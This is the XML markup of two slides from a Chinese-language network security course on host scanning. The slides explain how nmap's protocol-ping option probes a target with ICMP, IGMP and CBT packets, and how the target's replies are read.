              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="文本框 134"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="846455"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.“-PO”参数后面接的是协议号，可选中多个协议，“1,2,7”指的是ICMP、IGMP、CBT这三个协议。nmap工具发送了ICMP、IGMP、CBT三个数据包，如图2-2-31所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="2045335"/>
            <a:ext cx="5267325" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="文本框 135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="5626735"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-31 nmap工具发送数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行自定义多协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤七</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="文本框 135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="840740"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.发送了3个包，但目标主机只响应了ICMP的数据包，说明目标主机可能并不支持另外两种协议，因此没有响应，如图2-2-32所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="1762760"/>
            <a:ext cx="5276850" cy="3619500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="文本框 136"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="5382260"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-32 目标主机响应请求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行自定义多协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤七</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
